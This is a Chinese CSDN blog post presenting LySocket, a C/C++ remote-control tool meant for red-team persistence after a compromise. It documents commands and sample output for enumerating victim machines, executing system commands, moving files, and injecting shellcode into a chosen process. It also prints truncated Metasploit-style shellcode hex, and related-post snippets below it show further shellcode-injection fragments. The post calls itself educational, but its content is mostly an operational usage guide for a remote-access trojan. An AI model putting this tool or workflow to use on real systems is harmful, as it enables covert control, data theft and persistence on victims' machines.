LySocket 远程ShellCode注入工具

已于 2024-10-29 19:54:19 修改
阅读量1.8k 收藏 12
点赞数 9
CC 4.0 BY-SA版权
文章标签: c++ LySocket ShellCode
于 2024-10-29 19:53:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lyshark_csdn/article/details/143346123

一款基于C/C++开发的远程ShellCode注入工具,通常配合Metasploit一起使用,可实现远程注入反弹代码到指定进程,它由服务端和客户端两部分组成,并使用最少的代码实现了多Socket套接字管理机制,目前主要功能包括,获取客户端CPU、内存、进程列表、磁盘列表、目录与文件列表、执行系统命令、远程文件上传下载、以及远程ShellCode注入,该工具可用于红队渗透后的权限维持工作。本次分享工具源代码及使用方法,读者可根据自己的需要参考学习,并以此来更好的理解套接字是如何进行管理的。

image

首先,读者需要有一个公网IP地址,并在该地址上运行服务端程序,客户端可在被控主机上运行,为了防止技术滥用本工具并不提供开机自启动功能且不隐藏CMD窗口,其目的仅是让读者能够学习红队武器化的开发思路,若需应用于实战还需增加其他功能(例如加密传输),读者可根据自己的理解进行学习和完善。

ShowSocket

当在服务端上运行ShowSocket命令时,它会列出所有当前连接的客户端,其中包括客户端的IP地址、端口、及状态信息,该命令输出的信息通常包括以下内容:

[ LySocket ] # ShowSocket
--------------------------------------------------------------------
索引             客户端地址              端口            状态
--------------------------------------------------------------------
0                127.0.0.1               51453           Open
1                127.0.0.1               51454           Open
2                127.0.0.1               51455           Open
--------------------------------------------------------------------

GetCPU

当在服务端上运行GetCPU命令时,它会列出目标主机的CPU信息,包括CPUID、CPU型号、CPU空闲、CPU内核、CPU用户、CPU利用百分比等,该命令输出的信息通常包括以下内容:

[ LySocket ] # GetCPU --addr 127.0.0.1
--------------------------------------------------------------------
CPUID: 3219913727
CPUType: GenuineIntel
idle: 12500000
kernel: 12500000
user: 0
cpu: 0
--------------------------------------------------------------------

GetMemory

当在服务端上运行GetMemory命令时,它会获列出目标主机的内存信息,包括内存总量、内存剩余、内存已使用等信息,该命令输出的信息通常包括以下内容:

[ LySocket ] # GetMemory --addr 127.0.0.1
--------------------------------------------------------------------
内存总量                 内存剩余                内存已使用
--------------------------------------------------------------------
7878 MB                  4463 MB                 3415 MB
7878 MB                  4463 MB                 3415 MB
7878 MB                  4463 MB                 3415 MB
--------------------------------------------------------------------

GetProcessList

当在服务端上运行GetProcessList命令时,它会列出目标主机的进程列表信息,其中包括了进程PID、进程位数、进程名等,该功能主要用于挑选注入进程时使用,该命令输出的信息通常包括以下内容:

[ LySocket ] # GetProcessList --addr 127.0.0.1
--------------------------------------------------------------------
索引             进程PID                 进程位数                进程名
--------------------------------------------------------------------
0                4       x64             System
1                104     x64             Registry
2                440     x64             smss.exe
3                608     x64             csrss.exe
4                700     x64             csrss.exe
5                724     x64             wininit.exe
6                764     x64             winlogon.exe
7                844     x64             services.exe
8                860     x64             lsass.exe
9                980     x64             svchost.exe
10               1016    x64             svchost.exe
11               524     x64             fontdrvhost.exe
12               372     x64             fontdrvhost.exe
--------------------------------------------------------------------

GetDiskList

当在服务端上运行GetDiskList命令时,它会列出目标主机的磁盘列表信息,其中包括了磁盘名、磁盘类型、总容量、可用容量、已使用等,该命令输出的信息通常包括以下内容:

[ LySocket ] # GetDiskList --addr 127.0.0.1
----------------------------------------------------------------------------------------------------
磁盘名           磁盘类型                总容量                  可用空间                已使用
----------------------------------------------------------------------------------------------------
C:\              固定磁盘                256.000000              197.578125              58.421875
D:\              固定磁盘                675.508789              633.071289              42.437500
F:\              移动磁盘                1863.013672             1718.514648             144.499023
----------------------------------------------------------------------------------------------------

GetDiskFileList

当在服务端上运行GetDiskFileList命令时,它会列出目标主机特定目录下的磁盘文件信息,其中包括了文件名及文件大小,该命令输出的信息通常包括以下内容:

[ LySocket ] # GetDiskFileList --addr 127.0.0.1 --path c://
--------------------------------------------------------------------
文件名                           文件大小
--------------------------------------------------------------------
Boot                                                     0
bootmgr                                                  408344
PerfLogs                                                 0
Program Files                                            0
Program Files (x86)                                      0
ProgramData                                              0
Users                                                    0
Windows                                                  0
--------------------------------------------------------------------

GetCommand

当在服务端上运行GetCommand命令时,它会在目标系统中执行系统命令并输出执行结果,该命令输出的信息通常包括以下内容:

[ LySocket ] # GetCommand --addr 127.0.0.1 --cmd ipconfig
Windows IP 配置
以太网适配器 VMware Network Adapter VMnet1:

   连接特定的 DNS 后缀 . . . . . . . :
   本地链接 IPv6 地址. . . . . . . . : fe80::5484:f4a1:18e7:22e8%6
   IPv4 地址 . . . . . . . . . . . . : 192.168.16.1
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . :
--------------------------------------------------------------------

SendFile

当在服务端上运行SendFile命令时,它会将本地的特定文件发送到特定客户端上,例如将本地的d://lyshark.exe发送到对端的d://tmp/lyshark.exe目录下,可执行如下命令:

[ LySocket ] # SendFile --addr 127.0.0.1 --src d://lyshark.exe --dst d://tmp/
[+] 发送文件长度 14848
[*] 接收状态 1
[+] Success..

RecvFile

当在服务端上运行RecvFile命令时,它会将远程主机上特定文件接收到服务端上,例如将远程主机上的d://lyshark.exe接收到本地的d://tmp/目录下,可执行如下命令:

[ LySocket ] # RecvFile --addr 127.0.0.1 --src d://lyshark.exe --dst d://tmp/
[+] 生成保存路径 d://tmp/lyshark.exe
[+] 接收字节数: 14848
[+] Success..

InjectCode

当在服务端上运行InjectSelfCode命令时,它会将接收到的ShellCode注入到自身进程内并执行,例如执行如下命令:

[ LySocket ] # InjectSelfCode --addr 127.0.0.1 --shellcode fce88f0000006031d289e5648b52308b520c8b52140fb74a2631ff8b722831c0ac3c617c022c20c1cf0d01c74975ef528b5210578b423c01d08b407885c0744c01d0508b582001d38b481885c9743c498b348b31

若要将ShellCode注入到第三方进程中则可以使用InjectRemoteCode命令,该命令接收三个参数分别是目标地址、目标PID进程号、以及目标ShellCode代码,例如执行如下命令:

[ LySocket ] # InjectRemoteCode --addr 127.0.0.1 --pid 8762 --shellcode fce88f0000006031d289e5648b52308b520c8b52140fb74a2631ff8b722831c0ac3c617c022c20c1cf0d01c74975ef528b5210578b423c01d08b407885c0744c01d0508b582001d38b481885c9743c498b348b31

对于注入,推荐使用SendFile上传一个无窗体的进程,并通过调用GetCommand运行进程,最后调用InjectRemoteCode将其注入到对应的进程内,而不去使用系统中的其他进程。

ShellCode的另外一种玩法(远程线程注入ShellCode)[by Anskya]
04-06 2276
 [原创]ShellCode的另外一种玩法(远程线程注入ShellCode)介于小弟技术菜,请各位大哥不要"奸笑"希望可以指点一二转载请保留版权:by Anskya这里是说将ShellCode代码直接注射到远程进程内部使她运行!以下代码全部使用TASM为原型编写(MASM不太适合,不能自定义PE结构,为了某某人说我抄袭和盗版pkXX大哥的FASM大作,我这里就使用国内很少用的TASM为原型
笔记:ShellCode 远程线程注入
喜欢唱,rap,篮球的程序员
09-19 757
什么是进程,什么是线程进程就是4GB的空间,线程就是EIP。
【Windows系统编程】03.远线程注入ShellCode
WdIg-2023的博客
08-15 867
shellcode:本质上也是一段普通的代码,只不过特殊的编程手法,可以在任意环境下,不依赖于原有的依赖库执行。 本篇文章以最简单的方式为大家讲解远线程注入ShellCode
远程线程注入shellcode笔记
weixin_30872789的博客
10-17 355
#include "stdafx.h" #include <windows.h> #include <stdio.h> char shellcode[] = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42" "\x08\x8b\x72\x20\x8b\x12...
vue-plugin-load-script:一个Vue插件,用于注入远程脚本
04-30
Vue插件加载脚本 一个Vue 2插件,用于注入远程脚本。 请参阅vue3分支以获取Vue 3支持。 安装 # npm npm install --save vue-plugin-load-script # yarn yarn add vue-plugin-load-script 用 // In main.js import LoadScript from 'vue-plugin-load-script' ; Vue . use ( LoadScript ) ; // As a global method Vue . loadScript ( "https://maps.googleapis.com/maps/api/js?key=YOUR_API_KEY" ) . then ( ( ) => { // Script is loaded, do
远程注入代码
l460602540的专栏
03-19 1897
// InjectCode.cpp : 定义控制台应用程序的入口点。 #include "stdafx.h" #include typedef struct _REMOTE_PARAMETER { CHAR m_msgContent[MAX_PATH]; CHAR m_msgTitle[MAX_PATH]; DWORD m_dwMessageBoxAddr; }Remot
远程线程注入工具,可生成代码 可自定义shellcode注入进程-易语言
06-14
双击第三个输入框即可生成shellcode,这里默认的shellcode远程线程注入 注入的是当前程序选择注入的进程 这里选择最左下角的选项,然后再双击输入框 即可生成在自身程序执行的shellcode 这里说明一下哈,这里是...
ElfWizard:将Shellcode注入ELF二进制文件的简单工具
02-21
**ElfWizard:Shellcode注入ELF二进制文件的简易工具** 在计算机安全领域,Shellcode是一种用机器语言编写的代码片段,通常用于利用软件漏洞执行任意代码。它可以直接在目标系统的内存中运行,绕过常规的安全机制。...
shellcode转换工具
07-26
Shellcode转换工具是一种在IT行业中用于安全研究和逆向工程的专业工具。它主要用于将特定的机器码(通常为汇编代码)转换成“Shellcode”,Shellcode是一种可以在目标系统上执行任意代码的二进制 payload。这个过程...
【萌新踩坑记】手把手教你写个Shellcode注入
最新发布
WZN56789的博客
04-12 735
C++制作shellcode注入
shellcode帮助工具,直接把exe转shellcode
12-29
Shellcode Helper v1.62 Coded by TeLeMan (c) 2008-2013 Usage: schelper.exe [options] Options: -i [input file] input file (Default: stdin) -o [output file] output file (Default: stdout) -s input file format (Default: Auto-Detection) -sb input file format is Binary -sp the input file format's parameters -d output file format (Default: C format) -db output file format is Binary -dp the output file format's parameters -search get the start offset by the pattern: e.g. PK\x03\x04 -soff fix the match offset after searching (Default: 0) -off convert the input file from the offset (Default: 0) -len convert the input file with the length (Default: 0 - MAX) -en [encoder] encode shellcode (Default: XorDword) -de [encoder] decode shellcode (Default: Auto-Detection) -ex exclude characters: e.g. 0x00,0x01-0x1F,0xFF (Default: 0x00) -in incude characters only -ep the encoder's parameters -t [pid] execute or inject shellcode into process for testing -td [pid] execute or inject shellcode into process for debugging -stack put shellcode into stack and execute it (ESP is the shellcode start) -noinfo display no normal messages except error messages Available formats: 0 - C 1 - C(HexArray) 2 - Perl 3 - Python 4 - Ruby 5 - JavaScript(Escape) 6 - VBScript(Escape) 7 - Pascal 8 - MASM(Data) 9 - HexDump 10 - BitString 11 - HexString 12 - HexArray(C like) 13 - Base64 14 - Binary 15 - HexString(C like) 16 - HexString(Escape) 17 - HexString(JavaScript,UNICODE) 18 - URI(ISO-8859-1) 19 - XML(PCDATA) 20 - BigNumber 21 - BigNumber(Hex) 22 - BigNumber(BaseX) 23 - FloatPoint 24 - UnixTimestamp 25 - GUID 26 - MASM(ASM) 27 - NASM 28 - YASM(ASM) 29 - FASM(ASM) 30 - JWASM(ASM) 31 - POASM(ASM) 32 - GOASM(ASM) 33 - GNU ASM Available encoders:
脚本注入
开享
04-22 1916
案例:在网站留言板中注入脚本 方法1:在yysg
1.14 手工插入ShellCode反弹
CSDN
09-04 5130
PE格式是 Windows下最常用的可执行文件格式,理解PE文件格式不仅可以了解操作系统的加载流程,还可以更好的理解操作系统对进程和内存相关的管理知识,而有些技术必须建立在了解PE文件格式的基础上,如文件加密与解密,病毒分析,外挂技术等,本次的目标是手工修改或增加节区,并给特定可执行程序插入一段`ShellCode`代码,实现程序运行自动反弹一个Shell会话。
1.12 进程注入ShellCode套接字
CSDN
09-01 5600
在笔者前几篇文章中我们一直在探讨如何利用`Metasploit`这个渗透工具生成`ShellCode`以及如何将ShellCode注入到特定进程内,本章我们将自己实现一个正向`ShellCode`Shell,当进程被注入后,则我们可以通过利用NC等工具连接到被注入进程内,并以对方的权限及身份执行命令,该功能有利于于Shell的隐藏。本章的内容其原理与`《运用C语言编写ShellCode代码》`中所使用的原理保持一致,通过动态定位到我们所需的网络通信函数并以此来构建一个正向Shell,本章节内容对`Metas
C/C++ShellCode注入进程内存
CSDN
11-06 6469
内存注入ShellCode的优势就在于被发现的概率极低,甚至可以被忽略,这是因为ShellCode注入到进程内存中时,其并没有与之对应的硬盘文件,从而难以在磁盘中取证,但也存在一个弊端由于内存是易失性存储器,所以系统必须一直开机,不能关闭,该攻击手法可以应用于服务器上面,安全风险最小,注入后将注入器删除即可。
编写shellcode注入至进程
挖树
10-18 5232
shellcode 维基百科: 在计算机安全中,shellcode是一小段代码,可以用于软件漏洞利用的载荷。 被称为“shellcode”是因为它通常启动一个命令终端,攻击者可以通过这个终端控制受害的计算机,但是所有执行类似任务的代码片段都可以称作shellcode。 …… Shellcode通常是以机器码形式编写的。 去掉修饰词,shellcode就是一段机器码。 关于shellcode如何...
第10章 shellcode实战:17 实战:shellcode进程注入
李小咖·网安技术库
05-15 720
我最近做了一个关于shellcode入门和开发的专题课👩🏻‍💻,主要面向对网络安全技术感兴趣的小伙伴。这是视频版内容对应的文字版材料,内容里面的每一个环境我都亲自测试实操过的记录,有需要的小伙伴可以参考。传统的exe文件执行都是在自己的进程空间中,而shellcode本身没有固定的执行进程,它取决于加载器将它“安排”到哪个进程,它就在哪个进程执行。这种以进程“寄宿”方式执行的方式就被称为进程注入
ShellCode 格式化代码注入工具
CSDN
10-29 1916
一款基于C/C++开发的应用层汇编代码注入工具,可实现向特定进程内注入动态链接库模块或注入ShellCode汇编指令集,还可以实现第三方进程的汇编级Call调用,通常被用于协助渗透人员完成内存注入,同时也可用于对特定ShellCode汇编代码进行测试,以便更好地了解ShellCode的稳定及可用性。本次分享工具源代码及使用方法,读者可根据自己的需要参考学习,并以此来更好的理解内存注入技术。
Shellcode详解
N阶二进制的博客
06-18 3867
Shellcode是一种小巧、紧凑的机器代码,通常用于利用软件漏洞或注入攻击中。其名称来源于早期的黑客技术,其中的代码通常会启动一个命令行shell(如Bash或cmd),因此称为“shellcode”。不过,现在shellcode不仅仅用于启动shell,还可以执行各种恶意活动,如下载并执行恶意软件、修改系统设置等。
易语言实现远程线程注入工具 可自定义Shellcode
资源摘要信息:"远程线程注入工具,可生成代码,可自定义shellcode注入进程-易语言" 知识点: 1. 远程线程注入技术:远程线程注入是一种常见的代码注入技术,其主要原理是将一段代码注入远程进程的地址空间中,并...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

振翅碎流霞

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值